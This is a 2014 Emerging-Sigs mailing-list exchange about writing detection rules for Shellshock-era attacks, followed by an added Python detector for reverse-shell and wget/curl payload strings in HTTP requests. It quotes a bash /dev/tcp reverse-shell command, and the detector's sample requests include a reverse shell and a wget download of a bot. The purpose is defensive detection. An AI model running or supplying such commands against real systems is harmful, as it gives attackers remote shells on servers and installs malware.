[Emerging-Sigs] Do you have a rule for this?

Will Metcalf wmetcalf at emergingthreatspro.com
Fri Sep 26 14:25:39 EDT 2014


Was thinking about this, and also curl/wget/etc. with args inbound to
web_servers. Have also seen direct wgets for ELF bins, Perl DDoS bots,
Perl downloaders, etc.

Regards,

Will

On Fri, Sep 26, 2014 at 1:19 PM, Livio Ricciulli <livio at metaflows.com>
wrote:

> We have been seeing the bash exploit trying to execute:
>
> bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
>
> This will give the bad_ip a shell to the attacker. They would typically
> execute a wget followed by Trojan install.
>
> I was wondering, do you already have a rule that detects the above?
>
> If someone was executing that in anything, it would be bad, I think.
>
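
Added example, not part of the original thread and not an Emerging Threats rule: a small Python check for the strings discussed above (an interactive bash redirected to /dev/tcp, and wget/curl invoked with arguments) in the request line and headers of inbound HTTP requests. The pattern names, function names and sample requests are constructed for illustration; the addresses are documentation ranges.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical pattern set covering the payload strings named in the thread.
PATTERNS = {
    "bash_dev_tcp": re.compile(r"\bbash\s+-i\b[^\n]*/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    "dev_tcp_redirect": re.compile(r"[<>]&?\s*/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    "fetch_tool_with_args": re.compile(
        r"\b(?:wget|curl)\s+(?:-\S+\s+)*(?:https?|ftp)://\S+"),
}

def normalise(value):
    """Percent-decode up to twice so encoded payloads in a URI still match."""
    for _ in range(2):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_request(raw_request):
    """Return sorted (field, pattern_name) hits for one inbound HTTP request."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    fields = [("request-line", lines[0])]
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            fields.append((name.strip().lower(), value.strip()))
    hits = set()
    for name, value in fields:
        text = normalise(value)
        for label, rx in PATTERNS.items():
            if rx.search(text):
                hits.add((name, label))
    return sorted(hits)

# Constructed sample requests (not captured traffic).
SAMPLE_REVERSE = ("GET /cgi-bin/status HTTP/1.1\r\nHost: www.example.com\r\n"
                  "User-Agent: x bash -i >& /dev/tcp/192.0.2.10/4444 0>&1\r\n\r\n")
SAMPLE_FETCH = ("GET /cgi-bin/t.cgi?c=wget%20-q%20http%3A%2F%2F192.0.2.20%2Fbot.pl"
                " HTTP/1.1\r\nHost: www.example.com\r\n\r\n")
SAMPLE_BENIGN = ("GET /docs/wget-manual.html HTTP/1.1\r\nHost: www.example.com\r\n"
                 "User-Agent: curl/7.38.0\r\n\r\n")

if __name__ == "__main__":
    for sample in (SAMPLE_REVERSE, SAMPLE_FETCH, SAMPLE_BENIGN):
        print(scan_request(sample))
```

The benign sample shows why the fetch pattern requires whitespace and a URL after the tool name: a plain `curl/7.38.0` User-Agent or a path containing `wget` does not match.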

